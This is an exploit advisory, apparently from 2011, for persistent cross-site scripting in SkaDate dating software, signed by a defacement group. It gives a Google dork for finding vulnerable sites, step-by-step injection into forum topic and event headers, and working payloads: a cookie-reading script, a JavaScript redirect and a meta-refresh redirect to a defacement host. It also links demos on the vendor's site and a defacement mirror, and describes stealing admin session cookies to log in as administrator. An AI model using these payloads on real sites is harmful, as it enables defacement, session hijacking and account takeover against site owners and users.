Skadate suffers from multiple persistent cross site scripting vulnerabilities.
31c1d52d41ab08953cf6b149243eac204f74fec31c116572a26fcf8fefd758b9
# Exploit Title: [Skadate Persistent Cross Site Scripting Vulnerability]
# Google Dork: [Powered by SkaDate dating]
# Date: [2 January 2011]
# Author: Akastep
# Software Link: http://www.skadate.com
# Version: SkaDate dating software
# Tested on: nginx/0.7.62 (php version: PHP/5.2.14)
----- [ Exploit: Persistent Cross Site Scripting Vulnerability in Skadate] --------
Login to Skadate system:
Go to forum section and open new topic:
In header of topic just inject your code:
For ex: <script>alert(document.cookie);</script>
Or for deface that forum section:
For ex:
<script>location.replace("http://upw_ned.com/");</script>
Or Just use HTML Meta redirect:
<meta http-equiv="refresh" content="0;url=http://upw_ned.com/u4pwned/">
And Post the topic.
Demo:
http://www.skadate.com/demo/forum/forum.php?forum_id=9
Or:
http://www.skadate.com/demo/forum/topic.php?topic_id=133
Defacement of skadate forum section:
http://mirror-az.com/mirror/?id=8338
Second Vuln again Persistent XSS:
Go to events and Create New Event
And inject in header of will created event javascript sceanrio:
<script>alert(document.cookie);</script>
Demo:
http://www.skadate.com/demo/member/event.php?eventId=78
Also this vuln will affect anyone of who views your profile.
Attacker who can expoit this vulnerability can deface site (using javascript or html meta redirect way)
Or he/she can grab admin credentials (cookie session) and then using Minibrowser login to system as admin with stealed cookies.
/Akastep
wWw.Azhack.Com
WwW.Pirates-CrEW.org
wWw.AzDeFaCers.Org
#############################################################################################
Allahu Akbar!
#############################################################################################